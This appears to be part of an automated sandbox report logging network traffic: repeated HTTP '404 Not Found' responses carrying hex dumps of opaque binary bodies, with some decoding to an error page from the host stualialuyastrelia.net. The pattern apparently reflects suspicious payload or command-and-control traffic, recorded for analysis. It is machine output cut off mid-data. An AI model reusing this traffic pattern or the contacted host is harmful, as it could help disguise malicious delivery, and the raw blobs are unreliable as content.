Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f4 ff a9 71 a2 b8 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c1 a1 61 76 df f5 69 21 11 14 7e 5f af 9a 30 1d c9 a0 c1 a9 dd 7a 0d b0 4f 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3f 7c 88 28 c8 48 6e a1 c1 4a 9a 03 fd ec 9e ea 72 af 87 2b bd 61 f7 b5 42 bf 44 34 fd 78 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 64 9b 03 4c 49 56 ad f3 57 7b 2d ba 72 19 cd 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 e7 50 7b 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 f7 3d 66 49 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 c4 2e e6 5b 1e 44 ab 1e 26 75 10 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 81 7e 90 c7 7d 10 9f c0 ad df b3 99 27 98 8a cd 22 64 74 79 5c 6c 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f d0 56 ab 7a 8f b6 6c e0 cd 28 d8 37 00 52 ff 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 78 6f 15 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f 29 dc fa e0 19 8c 71 cd 37 33 33 6b 3a 47 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 81 06 5b fd 51 19 d0 93 79 42 b1 15 22 18 cf 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 61 4c b0 7b 06 45 f7 ff 78 ed 1a db de aa 11 13 bf 1e e1 92 24 08 4f c5 03 e3 f9 a1 19 5a de f5 69 f9 56 17 fe 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 70 42 bf 7a 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae b2 59 06 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 8b 0c 3c 27 d4 89 b3 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 c4 ed 43 40 77 bb c2 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 28 cc e0 8c 0a 96 fe c0 9b ae 1b 6f 53 cd 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5f 6b 81 ee f5 6c a8 df e6 1f e4 a6 cd 0f 9f 10 bd d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe ae 90 e9 02 76 10 61 0f 38 28 d2 6e 59 1f d0 d7 85 7a 8f fe 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e cd bc 70 d4 03 ab e3 98 76 72 0f ca 82 b1 0a 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 5a 0d ac 88 c1 a4 ee 33 25 d5 d8 a9 c3 72 e7 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 a5 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 5e fb 37 44 47 64 21 2d eb 34 da e1 37 a7 06 22 d4 89 fe 03 97 99 eb 2b 47 3d 70 a0 24 57 00 e2 13 70 a0 94 a7 7f 64 95 8e 64 42 ed 8f 55 62 2f 1b 19 8f af c5 06 0e f9 29 0b 90 0c 4d de e8 92 b6 d2 ab 77 71 96 7e 84 cb ac 62 8b 41 35 2a 01 2f 1d 9d 60 aa 42 6b 9b 9d 59 cc ef fe 41 38 8b 45 a0 db eb e8 5f f8 d1 e1 a6 af c4 15 67 60 82 36 f9 f1 4f dd 69 61 fa 59 94 6d aa be 25 c4 2e b0 95 e5 0a 7c 6d 20 c2 7e 7e d3 43 10 68 7c 14 10 9a fa 71 9c 1e ed 24 b6 8b b8 c6 9f 3f 9c 4b 8e 40 f9 70 12 d9 ee ab 1e ab 82 c8 15 4c a6 78 4e 24 c3 46 69 45 62 b0 35 e9 0d ac 52 48 fb 99 3d 9f f2 9a 4e 63 ce 3d 7a bd 94 7d 19 4f 8e b0 57 4b a5 6e cd 54 ce 29 ae 75 df bd 8e 1c 39 5c 7b e4 0b df 28 8b 4d a0 f8 bb c6 ca f0 fb 79 09 b6 93 ff 9f f0 19 b1 7f ff 30 fb 9d f9 36 9e 22 01 05 1b 69 f9 8e ff f2 e1 4b 3e e1 ae f2 a3 26 00 c7 5c 36 f7 4b 7f 51 82 7b 9a 7b a2 71 88 07 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 c2 4b ff 9d 33 7e 52 40 f0 5e c6 6d 66 e7 ac 04 28 84 42 40 97 9b c5 ba 8f e6 38 6c f1 ba 64 b1 1d e6 3e 51 8c 36 03 4b a1 7d df 8e 82 11 e8 e4 1f 1e a1 90 4e a1 54 45 a5 9e b7 1b 6f d3 cb 29 37 28 e7 5b 1e 54 ab 1e 23 7d 11 ee c3 ce 57 a3 4c 6d a7 1f d4 4c 68 91 9c 29 06 f1 2e 5e af 43 5b e5 0f e4 a6 6d 10 9f 10 b9 c9 b0 99 17 99 8a cd e4 7f 74 69 50 6d 43 e4 b9 8b 8b e2 62 7a d7 74 25 cc e0 e3 a9 b4 bb 01 ba 36 28 42 ad 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 f0 d4 52 a8 41 3a 96 8d 5f e5 17 23 dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 ea ae 88 59 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 3d fc dc f4 81 18 97 52 29 e7 ea 9e 13 f8 b8 4c 45 d1 f0 73 8d 53 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 62 03 81 f6 51 aa 4a 46 e9 be 3c 42 05 12 d1 9e 73 4f b6 65 a2 a5 10 78 60 78 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 90 e9 f3 72 6c a6 58 62 73 47 0b e9 33 72 8c e3 51 e0 bd 3d db 70 55 5a 17 dc 53 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 2e f1 fd 98 9d ad f1 44 68 f1 53 72 4a ce 39 b5 01 b2 f2 92 c2 e1 67 7e d3 a5 ad 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 20 10 3a 53 c8 db ab ad 82 ae 32 c8 c9 70 88 4a ad eb 8d 65 69 a7 eb f3 af 84 f1 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 92 1f ad 6f 82 a7 27 56 b2 e4 dd b2 aa 69 c0 8e ad 50 9a 9a 05 61 77 92 ae bf 06 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 86 a4 9e dc 91 b9 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 16 fc ce 64 4f 85 f6 c7 35 f3 73 07 03 d2 ff f9 d6 fb eb b2 8f 71 cd 01 70 33 d1 f2 71 45 7c 1f 57 44 63 bd fd 3c 50 15 51 fe 08 42 fa 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 60 91 54 5b fd 55 19 d0 ed 45 36 b1 17 26 58 4a 33 4f 62 3e 17 21 4b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 12 09 52 2b e5 8d 83 7b 7e 45 f7 ff d8 d8 16 db 8f 0d 13 13 bf 9e a2 92 0c 86 4d c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 64 8f a0 cd b9 dd 7a 34 c5 0d 19 fc 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 0e 69 b9 72 ce cc 23 b2 43 4d 31 79 96 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 42 58 46 a0 08 b7 9f 5c cf cc 46 d9 28 56 ac af e3 d9 55 3d 95 f9 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac c4 06 f6 31 32 14 9b c7 9b ac 69 3f 66 f1 0a 27 b1 1d a0 10 51 8c 32 54 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 15 8b fc d2 77 00 a0 cb 29 3e 28 e7 5b 1e 74 ed 1e 26 7f 11 ee c3 1c 12 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e ae 41 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc 